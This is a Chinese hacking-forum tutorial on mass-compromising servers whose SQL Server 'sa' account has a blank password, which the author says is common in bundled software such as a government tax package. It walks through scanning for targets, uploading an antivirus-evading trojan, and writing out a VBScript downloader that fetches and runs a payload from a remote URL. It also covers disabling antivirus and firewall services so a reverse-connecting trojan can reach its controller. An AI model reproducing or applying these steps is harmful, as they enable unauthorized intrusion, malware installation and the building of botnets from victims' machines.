sa空口令之快速抓肉鸡

黑基原创
作者：lucky_feng
      不要以为这个世界没有sa空口令的机器了，或许作为一个服务器的很少，但是现在很多软件都是使用sql数据库的，而软件的设计者（公司）一般都设置sql密码是空口令。最近发现某地一款政府指定使用的税务软件就是空口令，而且安装的专业人员都是这么设置的。

准备工具：WINNTAutoAttack sql综合利用工具
1：使用WINNTAutoAttack扫描sql空口令的ip，ip自己选择好了。如果RP没有问题的话，肯定会有的，只是多少的问题而已。
2：打开sql综合利用工具，填入你扫到的sa空口令的ip，其他都是默认的。
3：连接成功以后，有两个方法。
方法一：上传那里直接上传一个木马，当然不要文件太大了，最好是免杀的。然后在直接执行dos命令运行你的木马文件就行了。
方法二：在命令行echo一个down.vbs进去，down.vbs内容如下：
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2

echo完以后，最好type 你的文件名 看看成不成功。成功的话，c:\down.vbs http://www.sina.com/muma.exe c:\muma.exe (假设你的down.vbs放在c盘)，然后直接dos下运行下载的木马就行了。

问题：
1：有人说开3389最好了，但是开3389没有这么方便的了，还不如直接运行我们的反弹木马。
2：echo以后找不到这个文件。
原因可能是down.vbs被杀。
解决方法：瑞星2006和卡巴好像停不了服务的，看看上边的方法一可不可以吧。其它的杀毒软件dos命令察看服务名称，直接 net stop 服务名 就可以了。
3：木马上传以后找不到文件。
原因：被杀，免杀或者停掉杀毒软件。
4：反弹木马运行以后，连不到我的客户端。
原因可能是对方开了防火墙，停掉对应的服务或者杀掉对方的进程即可。
5：不能执行dos命令的，建议你放弃吧。肉鸡这么多，何不执著在这么一台呢？
6：dos命令不会的，google or baidu。